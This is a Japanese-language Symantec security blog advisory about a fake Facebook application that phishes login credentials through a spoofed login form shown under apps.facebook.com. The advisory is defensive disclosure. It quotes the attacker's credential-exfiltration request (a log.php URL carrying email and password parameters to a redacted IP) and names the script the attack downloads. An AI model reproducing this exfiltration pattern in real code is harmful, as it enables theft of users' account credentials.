シマンテックは最近、Facebook で「Tornado Randomly Appears During Soccer Game（サッカーの試合中に竜巻が無差別に発生）」というメッセージを表示するアプリケーションを確認しました。

メッセージをクリックすると、http://<IP 削除済み>/fb2.js からスクリプトが強制的にダウンロードされ、Facebook ログインメッセージが表示されます。Facebook にログインすると、悪質なアプリケーションがユーザーをログアウトし、再びログインするように要求します。

［ログイン］ボタンをクリックすると、ログインフォームが表示されます。

 
ログイン情報を入力し、［ログイン］ボタンをクリックすると、偽のアプリケーションによって、2 つの POST 要求が、1 つは Facebook.com、もう 1 つは悪質なサーバーに送信されます。悪質なサーバーに送信された要求は、次のような形式になっています。

http://IPRemoved/log.php?email=<電子メールアドレス>&pass=<パスワード>

一般的なアドバイスとして、URL 情報バーを確認すれば、URL の宛先を判別できるとされています。ただし、このケースでは、それだけでは不十分です。ログインフォームが表示されると URL バーには apps.facebook.com が示されますが、ログイン認証情報は別の悪質なサイトにも提供されてしまいます。

次に、悪質なサーバーに送られる電子メールアドレスとパスワードを表示する Fiddler のログを示します。

さらに、偽のアプリケーションは、自動投稿でこのリンクに「いいね」を付けます。これは、ユーザーのプロフィールに表示されます。

さらに、シマンテックでは同じ IP アドレスでホストされている類似の攻撃も確認しました。ただし、この場合は「Video: This is the best April Fools' prank ever!（ビデオ: エイプリルフールの最高のいたずら）」というメッセージが表示されます。この攻撃も上記と同じ手法を用いて、ユーザーの Facebook アカウントのユーザー名とパスワードを詐取します。

シマンテック製品をお使いのお客様はこの攻撃から保護されていますので、ご安心ください。シマンテックでは、すべてのセキュリティパッチと定義ファイルを定期的にインストールすることを強く推奨します。

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。